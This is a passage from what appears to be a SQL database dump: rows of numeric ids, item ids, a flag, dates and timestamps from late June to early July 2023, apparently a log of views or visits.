00:34:58'),(78995,4448,1,'2023-06-27','2023-06-27 00:42:47'),(78996,1872,1,'2023-06-27','2023-06-27 00:45:35'),(78997,1877,1,'2023-06-27','2023-06-27 00:46:37'),(78998,474,1,'2023-06-27','2023-06-27 00:49:56'),(78999,5028,1,'2023-06-27','2023-06-27 01:38:35'),(79000,4963,1,'2023-06-27','2023-06-27 02:55:42'),(79001,5058,1,'2023-06-27','2023-06-27 02:56:02'),(79002,68,1,'2023-06-27','2023-06-27 03:00:25'),(79003,3066,1,'2023-06-27','2023-06-27 03:23:38'),(79004,1610,1,'2023-06-27','2023-06-27 03:41:00'),(79005,4697,1,'2023-06-27','2023-06-27 04:26:02'),(79006,4677,1,'2023-06-27','2023-06-27 04:54:01'),(79007,2457,1,'2023-06-27','2023-06-27 05:09:00'),(79008,4703,1,'2023-06-27','2023-06-27 05:24:02'),(79009,4776,1,'2023-06-27','2023-06-27 05:39:03'),(79010,3313,1,'2023-06-27','2023-06-27 05:53:41'),(79011,4677,1,'2023-06-27','2023-06-27 05:54:02'),(79012,5317,1,'2023-06-27','2023-06-27 05:58:04'),(79013,76,1,'2023-06-27','2023-06-27 06:07:24'),(79014,2911,1,'2023-06-27','2023-06-27 07:25:11'),(79015,4911,1,'2023-06-27','2023-06-27 07:32:05'),(79016,3664,1,'2023-06-27','2023-06-27 08:10:18'),(79017,3102,1,'2023-06-27','2023-06-27 08:14:28'),(79018,4911,1,'2023-06-27','2023-06-27 08:40:39'),(79019,4963,1,'2023-06-27','2023-06-27 08:42:48'),(79020,1745,1,'2023-06-27','2023-06-27 08:55:15'),(79021,3249,1,'2023-06-27','2023-06-27 09:36:51'),(79022,4938,1,'2023-06-27','2023-06-27 09:54:12'),(79023,1745,1,'2023-06-27','2023-06-27 09:59:14'),(79024,1596,1,'2023-06-27','2023-06-27 10:18:57'),(79025,5122,1,'2023-06-27','2023-06-27 11:37:37'),(79026,4963,1,'2023-06-27','2023-06-27 14:11:16'),(79027,68,1,'2023-06-27','2023-06-27 14:11:38'),(79028,4963,1,'2023-06-27','2023-06-27 14:11:52'),(79029,1588,1,'2023-06-27','2023-06-27 14:18:22'),(79030,4963,1,'2023-06-27','2023-06-27 14:23:17'),(79031,5122,1,'2023-06-27','2023-06-27 14:42:14'),(79032,3738,1,'2023-06-27','2023-06-27 14:50:51'),(79033,3069,1,'2023-06-27','2023-06-27 15:02:07'),(79034,4685,1,'2023-06-27','2023-06-27 15:02:44'),(79035,91,1,'2023-06-27','2023-06-27 15:41:24'),(79036,2609,1,'2023-06-27','2023-06-27 15:43:48'),(79037,3069,1,'2023-06-27','2023-06-27 15:47:06'),(79038,1586,1,'2023-06-27','2023-06-27 15:58:04'),(79039,4520,1,'2023-06-27','2023-06-27 16:32:08'),(79040,2704,1,'2023-06-27','2023-06-27 16:32:11'),(79041,2159,1,'2023-06-27','2023-06-27 17:30:20'),(79042,4524,1,'2023-06-27','2023-06-27 17:32:23'),(79043,1870,1,'2023-06-27','2023-06-27 17:38:08'),(79044,473,1,'2023-06-27','2023-06-27 17:38:09'),(79045,4694,1,'2023-06-27','2023-06-27 17:47:23'),(79046,2293,1,'2023-06-27','2023-06-27 18:07:49'),(79047,4674,1,'2023-06-27','2023-06-27 18:14:40'),(79048,1596,1,'2023-06-27','2023-06-27 18:19:55'),(79049,1598,1,'2023-06-27','2023-06-27 18:54:17'),(79050,5058,1,'2023-06-27','2023-06-27 19:06:55'),(79051,468,1,'2023-06-27','2023-06-27 19:37:48'),(79052,3263,1,'2023-06-27','2023-06-27 19:54:19'),(79053,3263,1,'2023-06-27','2023-06-27 20:02:30'),(79054,1544,1,'2023-06-27','2023-06-27 20:20:07'),(79055,1544,1,'2023-06-27','2023-06-27 20:22:26'),(79056,1598,1,'2023-06-27','2023-06-27 20:30:29'),(79057,4520,1,'2023-06-27','2023-06-27 20:38:13'),(79058,3004,1,'2023-06-27','2023-06-27 20:49:17'),(79059,3175,1,'2023-06-27','2023-06-27 20:49:20'),(79060,570,1,'2023-06-27','2023-06-27 20:55:01'),(79061,1596,1,'2023-06-27','2023-06-27 22:02:39'),(79062,5163,1,'2023-06-27','2023-06-27 22:13:21'),(79063,68,1,'2023-06-27','2023-06-27 22:14:12'),(79064,80,1,'2023-06-27','2023-06-27 22:14:56'),(79065,68,1,'2023-06-27','2023-06-27 22:18:09'),(79066,5163,1,'2023-06-27','2023-06-27 22:18:22'),(79067,4412,1,'2023-06-27','2023-06-27 22:55:17'),(79068,5280,1,'2023-06-27','2023-06-27 23:15:46'),(79069,1594,1,'2023-06-27','2023-06-27 23:22:24'),(79070,2411,1,'2023-06-27','2023-06-27 23:25:20'),(79071,4759,1,'2023-06-28','2023-06-28 00:04:11'),(79072,4416,1,'2023-06-28','2023-06-28 00:26:51'),(79073,3764,1,'2023-06-28','2023-06-28 00:34:07'),(79074,5122,1,'2023-06-28','2023-06-28 00:36:01'),(79075,3764,1,'2023-06-28','2023-06-28 00:36:45'),(79076,1877,1,'2023-06-28','2023-06-28 02:23:09'),(79077,4517,1,'2023-06-28','2023-06-28 02:44:59'),(79078,1872,1,'2023-06-28','2023-06-28 03:10:25'),(79079,1596,1,'2023-06-28','2023-06-28 03:30:00'),(79080,4709,1,'2023-06-28','2023-06-28 04:04:50'),(79081,5301,1,'2023-06-28','2023-06-28 04:16:37'),(79082,470,1,'2023-06-28','2023-06-28 04:34:09'),(79083,476,1,'2023-06-28','2023-06-28 04:54:15'),(79084,485,1,'2023-06-28','2023-06-28 05:23:03'),(79085,479,1,'2023-06-28','2023-06-28 05:37:34'),(79086,1586,1,'2023-06-28','2023-06-28 05:40:59'),(79087,474,1,'2023-06-28','2023-06-28 05:52:00'),(79088,5304,1,'2023-06-28','2023-06-28 06:06:36'),(79089,4709,1,'2023-06-28','2023-06-28 06:21:12'),(79090,5301,1,'2023-06-28','2023-06-28 06:35:44'),(79091,91,1,'2023-06-28','2023-06-28 06:40:31'),(79092,3092,1,'2023-06-28','2023-06-28 06:44:48'),(79093,1877,1,'2023-06-28','2023-06-28 07:45:20'),(79094,5304,1,'2023-06-28','2023-06-28 09:14:19'),(79095,5310,1,'2023-06-28','2023-06-28 09:15:24'),(79096,4960,1,'2023-06-28','2023-06-28 10:52:15'),(79097,3313,1,'2023-06-28','2023-06-28 11:28:47'),(79098,1614,1,'2023-06-28','2023-06-28 11:47:32'),(79099,1588,1,'2023-06-28','2023-06-28 11:55:49'),(79100,1588,1,'2023-06-28','2023-06-28 12:05:42'),(79101,1610,1,'2023-06-28','2023-06-28 12:23:37'),(79102,1610,1,'2023-06-28','2023-06-28 12:24:19'),(79103,91,1,'2023-06-28','2023-06-28 12:43:52'),(79104,5153,1,'2023-06-28','2023-06-28 13:17:25'),(79105,481,1,'2023-06-28','2023-06-28 13:18:28'),(79106,3096,1,'2023-06-28','2023-06-28 14:25:12'),(79107,1728,1,'2023-06-28','2023-06-28 15:04:49'),(79108,1872,1,'2023-06-28','2023-06-28 15:34:07'),(79109,1614,1,'2023-06-28','2023-06-28 15:45:12'),(79110,87,1,'2023-06-28','2023-06-28 16:03:07'),(79111,91,1,'2023-06-28','2023-06-28 16:04:05'),(79112,4944,1,'2023-06-28','2023-06-28 16:13:30'),(79113,4329,1,'2023-06-28','2023-06-28 16:37:58'),(79114,484,1,'2023-06-28','2023-06-28 16:55:30'),(79115,4966,1,'2023-06-28','2023-06-28 17:40:40'),(79116,4520,1,'2023-06-28','2023-06-28 18:08:13'),(79117,4911,1,'2023-06-28','2023-06-28 18:10:16'),(79118,4911,1,'2023-06-28','2023-06-28 18:35:15'),(79119,1728,1,'2023-06-28','2023-06-28 18:37:45'),(79120,470,1,'2023-06-28','2023-06-28 18:42:19'),(79121,467,1,'2023-06-28','2023-06-28 18:54:09'),(79122,1610,1,'2023-06-28','2023-06-28 19:27:21'),(79123,5001,1,'2023-06-28','2023-06-28 19:40:31'),(79124,4960,1,'2023-06-28','2023-06-28 19:44:00'),(79125,5307,1,'2023-06-28','2023-06-28 20:09:23'),(79126,5298,1,'2023-06-28','2023-06-28 22:02:01'),(79127,1602,1,'2023-06-28','2023-06-28 22:04:23'),(79128,5292,1,'2023-06-28','2023-06-28 22:07:57'),(79129,4776,1,'2023-06-28','2023-06-28 22:15:02'),(79130,2457,1,'2023-06-28','2023-06-28 22:20:26'),(79131,4329,1,'2023-06-28','2023-06-28 23:29:44'),(79132,1614,1,'2023-06-28','2023-06-28 23:50:40'),(79133,4485,1,'2023-06-28','2023-06-28 23:51:21'),(79134,2956,1,'2023-06-29','2023-06-29 00:12:07'),(79135,68,1,'2023-06-29','2023-06-29 00:22:15'),(79136,5253,1,'2023-06-29','2023-06-29 01:14:45'),(79137,1877,1,'2023-06-29','2023-06-29 01:20:14'),(79138,4551,1,'2023-06-29','2023-06-29 01:20:36'),(79139,4556,1,'2023-06-29','2023-06-29 01:32:17'),(79140,487,1,'2023-06-29','2023-06-29 01:55:57'),(79141,1586,1,'2023-06-29','2023-06-29 02:14:39'),(79142,4332,1,'2023-06-29','2023-06-29 02:15:38'),(79143,1544,1,'2023-06-29','2023-06-29 02:18:04'),(79144,3004,1,'2023-06-29','2023-06-29 02:31:56'),(79145,1588,1,'2023-06-29','2023-06-29 03:04:51'),(79146,1588,1,'2023-06-29','2023-06-29 03:17:27'),(79147,1586,1,'2023-06-29','2023-06-29 04:09:13'),(79148,5080,1,'2023-06-29','2023-06-29 04:23:30'),(79149,4420,1,'2023-06-29','2023-06-29 04:31:54'),(79150,1586,1,'2023-06-29','2023-06-29 04:37:09'),(79151,1600,1,'2023-06-29','2023-06-29 04:49:11'),(79152,3738,1,'2023-06-29','2023-06-29 05:47:40'),(79153,1751,1,'2023-06-29','2023-06-29 07:05:39'),(79154,4911,1,'2023-06-29','2023-06-29 07:16:11'),(79155,4681,1,'2023-06-29','2023-06-29 07:20:15'),(79156,4966,1,'2023-06-29','2023-06-29 07:51:17'),(79157,4524,1,'2023-06-29','2023-06-29 08:00:48'),(79158,4703,1,'2023-06-29','2023-06-29 08:38:36'),(79159,4759,1,'2023-06-29','2023-06-29 09:32:51'),(79160,91,1,'2023-06-29','2023-06-29 10:08:39'),(79161,1586,1,'2023-06-29','2023-06-29 10:10:14'),(79162,4960,1,'2023-06-29','2023-06-29 10:46:17'),(79163,68,1,'2023-06-29','2023-06-29 10:48:24'),(79164,3083,1,'2023-06-29','2023-06-29 11:32:06'),(79165,5046,1,'2023-06-29','2023-06-29 11:47:05'),(79166,1872,1,'2023-06-29','2023-06-29 11:48:38'),(79167,5062,1,'2023-06-29','2023-06-29 11:53:50'),(79168,1596,1,'2023-06-29','2023-06-29 12:21:41'),(79169,91,1,'2023-06-29','2023-06-29 13:08:59'),(79170,468,1,'2023-06-29','2023-06-29 13:14:33'),(79171,488,1,'2023-06-29','2023-06-29 13:28:20'),(79172,4911,1,'2023-06-29','2023-06-29 13:44:58'),(79173,4747,1,'2023-06-29','2023-06-29 13:57:39'),(79174,4520,1,'2023-06-29','2023-06-29 14:23:32'),(79175,1614,1,'2023-06-29','2023-06-29 14:34:52'),(79176,4963,1,'2023-06-29','2023-06-29 14:36:29'),(79177,1724,1,'2023-06-29','2023-06-29 14:53:26'),(79178,3705,1,'2023-06-29','2023-06-29 16:15:53'),(79179,1586,1,'2023-06-29','2023-06-29 16:40:08'),(79180,1778,1,'2023-06-29','2023-06-29 17:16:33'),(79181,4911,1,'2023-06-29','2023-06-29 17:32:22'),(79182,5259,1,'2023-06-29','2023-06-29 17:39:53'),(79183,2904,1,'2023-06-29','2023-06-29 17:46:37'),(79184,4566,1,'2023-06-29','2023-06-29 18:07:34'),(79185,4514,1,'2023-06-29','2023-06-29 18:49:35'),(79186,4454,1,'2023-06-29','2023-06-29 20:04:21'),(79187,335,1,'2023-06-29','2023-06-29 20:04:23'),(79188,74,1,'2023-06-29','2023-06-29 20:05:38'),(79189,4911,1,'2023-06-29','2023-06-29 20:19:07'),(79190,3706,1,'2023-06-29','2023-06-29 20:34:23'),(79191,5256,1,'2023-06-29','2023-06-29 20:49:21'),(79192,68,1,'2023-06-29','2023-06-29 20:59:21'),(79193,469,1,'2023-06-29','2023-06-29 21:55:26'),(79194,335,1,'2023-06-29','2023-06-29 22:02:28'),(79195,5256,1,'2023-06-29','2023-06-29 22:24:52'),(79196,4454,1,'2023-06-29','2023-06-29 22:47:24'),(79197,5256,1,'2023-06-29','2023-06-29 22:50:40'),(79198,4712,1,'2023-06-29','2023-06-29 22:57:38'),(79199,468,1,'2023-06-29','2023-06-29 23:09:51'),(79200,468,1,'2023-06-29','2023-06-29 23:32:24'),(79201,5163,1,'2023-06-29','2023-06-29 23:37:01'),(79202,2159,1,'2023-06-30','2023-06-30 00:01:01'),(79203,80,1,'2023-06-30','2023-06-30 01:25:44'),(79204,4938,1,'2023-06-30','2023-06-30 01:59:55'),(79205,2503,1,'2023-06-30','2023-06-30 02:02:31'),(79206,4938,1,'2023-06-30','2023-06-30 02:22:12'),(79207,3226,1,'2023-06-30','2023-06-30 02:25:36'),(79208,1582,1,'2023-06-30','2023-06-30 02:28:47'),(79209,1594,1,'2023-06-30','2023-06-30 02:46:26'),(79210,1594,1,'2023-06-30','2023-06-30 02:55:02'),(79211,80,1,'2023-06-30','2023-06-30 03:15:04'),(79212,5062,1,'2023-06-30','2023-06-30 03:21:25'),(79213,1582,1,'2023-06-30','2023-06-30 03:29:40'),(79214,68,1,'2023-06-30','2023-06-30 04:05:02'),(79215,1724,1,'2023-06-30','2023-06-30 04:06:03'),(79216,3226,1,'2023-06-30','2023-06-30 04:11:27'),(79217,4717,1,'2023-06-30','2023-06-30 04:17:57'),(79218,5256,1,'2023-06-30','2023-06-30 04:21:37'),(79219,469,1,'2023-06-30','2023-06-30 04:31:07'),(79220,3705,1,'2023-06-30','2023-06-30 04:50:10'),(79221,1582,1,'2023-06-30','2023-06-30 05:03:19'),(79222,477,1,'2023-06-30','2023-06-30 05:03:29'),(79223,91,1,'2023-06-30','2023-06-30 05:03:50'),(79224,1544,1,'2023-06-30','2023-06-30 05:21:30'),(79225,4529,1,'2023-06-30','2023-06-30 05:27:54'),(79226,5280,1,'2023-06-30','2023-06-30 05:36:04'),(79227,1594,1,'2023-06-30','2023-06-30 05:46:57'),(79228,4454,1,'2023-06-30','2023-06-30 05:51:25'),(79229,2159,1,'2023-06-30','2023-06-30 06:23:59'),(79230,4454,1,'2023-06-30','2023-06-30 06:51:42'),(79231,4911,1,'2023-06-30','2023-06-30 07:52:24'),(79232,468,1,'2023-06-30','2023-06-30 07:55:16'),(79233,570,1,'2023-06-30','2023-06-30 08:34:32'),(79234,468,1,'2023-06-30','2023-06-30 08:50:40'),(79235,5256,1,'2023-06-30','2023-06-30 09:05:42'),(79236,468,1,'2023-06-30','2023-06-30 09:20:40'),(79237,474,1,'2023-06-30','2023-06-30 09:22:07'),(79238,473,1,'2023-06-30','2023-06-30 09:22:07'),(79239,2617,1,'2023-06-30','2023-06-30 10:11:57'),(79240,2503,1,'2023-06-30','2023-06-30 10:52:53'),(79241,4911,1,'2023-06-30','2023-06-30 11:18:25'),(79242,570,1,'2023-06-30','2023-06-30 11:22:54'),(79243,91,1,'2023-06-30','2023-06-30 11:24:02'),(79244,2165,1,'2023-06-30','2023-06-30 11:30:16'),(79245,4911,1,'2023-06-30','2023-06-30 11:30:52'),(79246,91,1,'2023-06-30','2023-06-30 12:40:41'),(79247,468,1,'2023-06-30','2023-06-30 14:11:01'),(79248,2165,1,'2023-06-30','2023-06-30 14:11:30'),(79249,1608,1,'2023-06-30','2023-06-30 14:29:27'),(79250,5304,1,'2023-06-30','2023-06-30 14:47:27'),(79251,4753,1,'2023-06-30','2023-06-30 14:54:14'),(79252,5256,1,'2023-06-30','2023-06-30 14:58:57'),(79253,4454,1,'2023-06-30','2023-06-30 15:20:28'),(79254,480,1,'2023-06-30','2023-06-30 15:32:26'),(79255,4785,1,'2023-06-30','2023-06-30 15:50:31'),(79256,4514,1,'2023-06-30','2023-06-30 16:10:01'),(79257,4888,1,'2023-06-30','2023-06-30 16:18:14'),(79258,4911,1,'2023-06-30','2023-06-30 16:23:10'),(79259,84,1,'2023-06-30','2023-06-30 16:23:37'),(79260,1877,1,'2023-06-30','2023-06-30 16:24:00'),(79261,72,1,'2023-06-30','2023-06-30 16:24:26'),(79262,5343,1,'2023-06-30','2023-06-30 16:25:01'),(79263,72,1,'2023-06-30','2023-06-30 16:25:11'),(79264,5346,1,'2023-06-30','2023-06-30 16:25:26'),(79265,4911,1,'2023-06-30','2023-06-30 16:35:19'),(79266,4454,1,'2023-06-30','2023-06-30 16:50:28'),(79267,468,1,'2023-06-30','2023-06-30 17:21:36'),(79268,5071,1,'2023-06-30','2023-06-30 17:39:24'),(79269,3006,1,'2023-06-30','2023-06-30 18:03:57'),(79270,1596,1,'2023-06-30','2023-06-30 18:25:04'),(79271,4420,1,'2023-06-30','2023-06-30 18:28:35'),(79272,468,1,'2023-06-30','2023-06-30 18:50:32'),(79273,1582,1,'2023-06-30','2023-06-30 18:53:09'),(79274,488,1,'2023-06-30','2023-06-30 19:05:27'),(79275,4966,1,'2023-06-30','2023-06-30 19:11:14'),(79276,4420,1,'2023-06-30','2023-06-30 19:22:53'),(79277,468,1,'2023-06-30','2023-06-30 19:35:28'),(79278,4566,1,'2023-06-30','2023-06-30 19:40:20'),(79279,335,1,'2023-06-30','2023-06-30 19:42:47'),(79280,87,1,'2023-06-30','2023-06-30 19:55:40'),(79281,89,1,'2023-06-30','2023-06-30 19:55:44'),(79282,4930,1,'2023-06-30','2023-06-30 19:55:49'),(79283,91,1,'2023-06-30','2023-06-30 19:55:52'),(79284,68,1,'2023-06-30','2023-06-30 19:55:57'),(79285,76,1,'2023-06-30','2023-06-30 19:56:01'),(79286,72,1,'2023-06-30','2023-06-30 19:56:08'),(79287,335,1,'2023-06-30','2023-06-30 19:56:13'),(79288,108,1,'2023-06-30','2023-06-30 19:56:16'),(79289,3694,1,'2023-06-30','2023-06-30 19:57:52'),(79290,4712,1,'2023-06-30','2023-06-30 20:15:16'),(79291,4420,1,'2023-06-30','2023-06-30 21:50:57'),(79292,80,1,'2023-06-30','2023-06-30 21:56:01'),(79293,1596,1,'2023-06-30','2023-06-30 23:06:22'),(79294,1588,1,'2023-07-01','2023-07-01 00:18:32'),(79295,1594,1,'2023-07-01','2023-07-01 01:07:29'),(79296,1877,1,'2023-07-01','2023-07-01 01:16:06'),(79297,4866,1,'2023-07-01','2023-07-01 02:09:53'),(79298,4485,1,'2023-07-01','2023-07-01 02:23:14'),(79299,4866,1,'2023-07-01','2023-07-01 02:24:50'),(79300,4520,1,'2023-07-01','2023-07-01 02:32:15'),(79301,5256,1,'2023-07-01','2023-07-01 02:39:44'),(79302,4517,1,'2023-07-01','2023-07-01 02:43:28'),(79303,3781,1,'2023-07-01','2023-07-01 02:46:21'),(79304,3691,1,'2023-07-01','2023-07-01 03:36:49'),(79305,3063,1,'2023-07-01','2023-07-01 03:49:12'),(79306,4485,1,'2023-07-01','2023-07-01 03:52:49'),(79307,1608,1,'2023-07-01','2023-07-01 03:55:59'),(79308,80,1,'2023-07-01','2023-07-01 04:06:44'),(79309,467,1,'2023-07-01','2023-07-01 04:09:44'),(79310,68,1,'2023-07-01','2023-07-01 04:25:13'),(79311,1586,1,'2023-07-01','2023-07-01 04:27:11'),(79312,2617,1,'2023-07-01','2023-07-01 04:43:14'),(79313,1586,1,'2023-07-01','2023-07-01 05:20:35'),(79314,80,1,'2023-07-01','2023-07-01 05:34:18'),(79315,468,1,'2023-07-01','2023-07-01 05:44:14'),(79316,5256,1,'2023-07-01','2023-07-01 05:59:15'),(79317,3534,1,'2023-07-01','2023-07-01 06:09:42'),(79318,2813,1,'2023-07-01','2023-07-01 06:48:24'),(79319,3764,1,'2023-07-01','2023-07-01 06:58:00'),(79320,5101,1,'2023-07-01','2023-07-01 07:42:57'),(79321,3534,1,'2023-07-01','2023-07-01 07:43:21'),(79322,5163,1,'2023-07-01','2023-07-01 08:28:57'),(79323,5289,1,'2023-07-01','2023-07-01 09:12:56'),(79324,91,1,'2023-07-01','2023-07-01 09:42:12'),(79325,80,1,'2023-07-01','2023-07-01 09:58:35'),(79326,80,1,'2023-07-01','2023-07-01 10:49:25'),(79327,3664,1,'2023-07-01','2023-07-01 11:38:42'),(79328,4911,1,'2023-07-01','2023-07-01 12:16:00'),(79329,4911,1,'2023-07-01','2023-07-01 12:40:18'),(79330,4911,1,'2023-07-01','2023-07-01 12:40:39'),(79331,80,1,'2023-07-01','2023-07-01 12:40:57'),(79332,80,1,'2023-07-01','2023-07-01 12:41:30'),(79333,2751,1,'2023-07-01','2023-07-01 13:19:01'),(79334,1586,1,'2023-07-01','2023-07-01 13:24:42'),(79335,1586,1,'2023-07-01','2023-07-01 13:25:36'),(79336,4911,1,'2023-07-01','2023-07-01 14:36:59'),(79337,2904,1,'2023-07-01','2023-07-01 14:37:36'),(79338,4911,1,'2023-07-01','2023-07-01 14:37:48'),(79339,4700,1,'2023-07-01','2023-07-01 15:02:02'),(79340,5256,1,'2023-07-01','2023-07-01 15:02:04'),(79341,468,1,'2023-07-01','2023-07-01 15:13:15'),(79342,4454,1,'2023-07-01','2023-07-01 15:17:06'),(79343,468,1,'2023-07-01','2023-07-01 15:24:36'),(79344,4454,1,'2023-07-01','2023-07-01 15:31:57'),(79345,5256,1,'2023-07-01','2023-07-01 15:35:44'),(79346,4485,1,'2023-07-01','2023-07-01 15:47:02'),(79347,1600,1,'2023-07-01','2023-07-01 16:04:40'),(79348,4485,1,'2023-07-01','2023-07-01 16:32:02'),(79349,3585,1,'2023-07-01','2023-07-01 16:52:07'),(79350,4685,1,'2023-07-01','2023-07-01 17:05:56'),(79351,4436,1,'2023-07-01','2023-07-01 17:11:10'),(79352,5163,1,'2023-07-01','2023-07-01 17:22:46'),(79353,4874,1,'2023-07-01','2023-07-01 17:33:45'),(79354,1544,1,'2023-07-01','2023-07-01 17:47:33'),(79355,5122,1,'2023-07-01','2023-07-01 18:15:04'),(79356,467,1,'2023-07-01','2023-07-01 18:24:01'),(79357,5024,1,'2023-07-01','2023-07-01 18:39:15'),(79358,5295,1,'2023-07-01','2023-07-01 18:53:58'),(79359,5292,1,'2023-07-01','2023-07-01 19:01:35'),(79360,4960,1,'2023-07-01','2023-07-01 19:06:28'),(79361,5289,1,'2023-07-01','2023-07-01 19:09:21'),(79362,5080,1,'2023-07-01','2023-07-01 19:09:53'),(79363,5298,1,'2023-07-01','2023-07-01 19:16:46'),(79364,2904,1,'2023-07-01','2023-07-01 19:19:05'),(79365,487,1,'2023-07-01','2023-07-01 19:24:23'),(79366,5289,1,'2023-07-01','2023-07-01 19:30:21'),(79367,5301,1,'2023-07-01','2023-07-01 19:32:00'),(79368,3764,1,'2023-07-01','2023-07-01 19:38:30'),(79369,5292,1,'2023-07-01','2023-07-01 19:38:55'),(79370,3764,1,'2023-07-01','2023-07-01 19:38:58'),(79371,474,1,'2023-07-01','2023-07-01 19:39:39'),(79372,1544,1,'2023-07-01','2023-07-01 19:47:26'),(79373,4674,1,'2023-07-01','2023-07-01 19:54:47'),(79374,5334,1,'2023-07-01','2023-07-01 19:58:07'),(79375,4776,1,'2023-07-01','2023-07-01 20:09:59'),(79376,4688,1,'2023-07-01','2023-07-01 20:40:24'),(79377,4700,1,'2023-07-01','2023-07-01 20:55:36'),(79378,76,1,'2023-07-01','2023-07-01 20:59:33'),(79379,5253,1,'2023-07-01','2023-07-01 21:06:51'),(79380,4911,1,'2023-07-01','2023-07-01 21:13:27'),(79381,474,1,'2023-07-01','2023-07-01 21:18:06'),(79382,4668,1,'2023-07-01','2023-07-01 21:18:08'),(79383,4703,1,'2023-07-01','2023-07-01 21:29:34'),(79384,4703,1,'2023-07-01','2023-07-01 21:29:36'),(79385,473,1,'2023-07-01','2023-07-01 21:51:51'),(79386,473,1,'2023-07-01','2023-07-01 21:52:56'),(79387,5310,1,'2023-07-01','2023-07-01 22:03:07'),(79388,4542,1,'2023-07-01','2023-07-01 22:08:49'),(79389,5304,1,'2023-07-01','2023-07-01 22:14:24'),(79390,5307,1,'2023-07-01','2023-07-01 22:25:36'),(79391,470,1,'2023-07-01','2023-07-01 22:48:06'),(79392,5304,1,'2023-07-01','2023-07-01 23:09:03'),(79393,3752,1,'2023-07-02','2023-07-02 00:19:32'),(79394,1745,1,'2023-07-02','2023-07-02 00:25:26'),(79395,2297,1,'2023-07-02','2023-07-02 00:48:48'),(79396,474,1,'2023-07-02','2023-07-02 00:56:03'),(79397,4911,1,'2023-07-02','2023-07-02 01:33:44'),(79398,4911,1,'2023-07-02','2023-07-02 01:33:52'),(79399,4911,1,'2023-07-02','2023-07-02 01:33:53'),(79400,4668,1,'2023-07-02','2023-07-02 01:44:19'),(79401,3229,1,'2023-07-02','2023-07-02 01:58:07'),(79402,5314,1,'2023-07-02','2023-07-02 01:58:34'),(79403,3229,1,'2023-07-02','2023-07-02 02:05:30'),(79404,5256,1,'2023-07-02','2023-07-02 02:12:59'),(79405,4454,1,'2023-07-02','2023-07-02 02:31:46'),(79406,5128,1,'2023-07-02','2023-07-02 02:50:34'),(79407,4768,1,'2023-07-02','2023-07-02 04:09:55'),(79408,3307,1,'2023-07-02','2023-07-02 04:22:04'),(79409,4960,1,'2023-07-02','2023-07-02 04:50:06'),(79410,5298,1,'2023-07-02','2023-07-02 04:55:47'),(79411,5301,1,'2023-07-02','2023-07-02 04:56:54'),(79412,4911,1,'2023-07-02','2023-07-02 04:58:41'),(79413,4960,1,'2023-07-02','2023-07-02 05:07:48'),(79414,4960,1,'2023-07-02','2023-07-02 05:11:16'),(79415,5256,1,'2023-07-02','2023-07-02 05:42:19'),(79416,4454,1,'2023-07-02','2023-07-02 05:42:22'),(79417,5153,1,'2023-07-02','2023-07-02 07:19:27'),(79418,4674,1,'2023-07-02','2023-07-02 07:49:06'),(79419,4776,1,'2023-07-02','2023-07-02 08:14:01'),(79420,4685,1,'2023-07-02','2023-07-02 08:31:32'),(79421,4977,1,'2023-07-02','2023-07-02 09:19:03'),(79422,1544,1,'2023-07-02','2023-07-02 10:01:04'),(79423,4556,1,'2023-07-02','2023-07-02 10:03:18'),(79424,5307,1,'2023-07-02','2023-07-02 10:30:18'),(79425,5292,1,'2023-07-02','2023-07-02 10:33:47'),(79426,470,1,'2023-07-02','2023-07-02 10:48:03'),(79427,468,1,'2023-07-02','2023-07-02 10:58:28'),(79428,1600,1,'2023-07-02','2023-07-02 11:20:21'),(79429,5259,1,'2023-07-02','2023-07-02 11:23:41'),(79430,89,1,'2023-07-02','2023-07-02 11:31:10'),(79431,80,1,'2023-07-02','2023-07-02 12:18:08'),(79432,4612,1,'2023-07-02','2023-07-02 12:22:48'),(79433,3482,1,'2023-07-02','2023-07-02 13:23:36'),(79434,3498,1,'2023-07-02','2023-07-02 13:23:36'),(79435,3742,1,'2023-07-02','2023-07-02 13:23:36'),(79436,5271,1,'2023-07-02','2023-07-02 13:23:37'),(79437,1600,1,'2023-07-02','2023-07-02 13:48:04'),(79438,5163,1,'2023-07-02','2023-07-02 13:52:38'),(79439,74,1,'2023-07-02','2023-07-02 13:53:35'),(79440,74,1,'2023-07-02','2023-07-02 13:53:58'),(79441,5163,1,'2023-07-02','2023-07-02 13:54:24'),(79442,3030,1,'2023-07-02','2023-07-02 14:06:23'),(79443,5256,1,'2023-07-02','2023-07-02 14:10:27'),(79444,4454,1,'2023-07-02','2023-07-02 14:10:34'),(79445,5134,1,'2023-07-02','2023-07-02 14:27:03'),(79446,1602,1,'2023-07-02','2023-07-02 14:30:30'),(79447,5256,1,'2023-07-02','2023-07-02 14:55:24'),(79448,4454,1,'2023-07-02','2023-07-02 14:55:26'),(79449,3691,1,'2023-07-02','2023-07-02 15:18:40'),(79450,1588,1,'2023-07-02','2023-07-02 15:19:05'),(79451,4556,1,'2023-07-02','2023-07-02 15:38:14'),(79452,3752,1,'2023-07-02','2023-07-02 15:42:45'),(79453,1604,1,'2023-07-02','2023-07-02 17:05:11'),(79454,1602,1,'2023-07-02','2023-07-02 17:27:33'),(79455,91,1,'2023-07-02','2023-07-02 17:30:05'),(79456,2609,1,'2023-07-02','2023-07-02 17:48:35'),(79457,4335,1,'2023-07-02','2023-07-02 18:19:49'),(79458,470,1,'2023-07-02','2023-07-02 18:38:18'),(79459,1766,1,'2023-07-02','2023-07-02 18:45:57'),(79460,2904,1,'2023-07-02','2023-07-02 18:52:19'),(79461,1872,1,'2023-07-02','2023-07-02 18:54:06'),(79462,1872,1,'2023-07-02','2023-07-02 18:54:07'),(79463,1877,1,'2023-07-02','2023-07-02 19:24:36'),(79464,1877,1,'2023-07-02','2023-07-02 19:24:38'),(79465,4681,1,'2023-07-02','2023-07-02 19:46:27'),(79466,4681,1,'2023-07-02','2023-07-02 19:46:29'),(79467,4691,1,'2023-07-02','2023-07-02 19:57:12'),(79468,4691,1,'2023-07-02','2023-07-02 19:57:14'),(79469,5256,1,'2023-07-02','2023-07-02 20:07:59'),(79470,5134,1,'2023-07-02','2023-07-02 20:08:15'),(79471,4709,1,'2023-07-02','2023-07-02 20:18:49'),(79472,4709,1,'2023-07-02','2023-07-02 20:18:51'),(79473,4697,1,'2023-07-02','2023-07-02 20:29:33'),(79474,4697,1,'2023-07-02','2023-07-02 20:29:35'),(79475,4694,1,'2023-07-02','2023-07-02 20:40:18'),(79476,4694,1,'2023-07-02','2023-07-02 20:40:20'),(79477,1608,1,'2023-07-02','2023-07-02 20:48:50'),(79478,76,1,'2023-07-02','2023-07-02 20:49:35'),(79479,4706,1,'2023-07-02','2023-07-02 20:51:03'),(79480,4706,1,'2023-07-02','2023-07-02 20:51:05'),(79481,470,1,'2023-07-02','2023-07-02 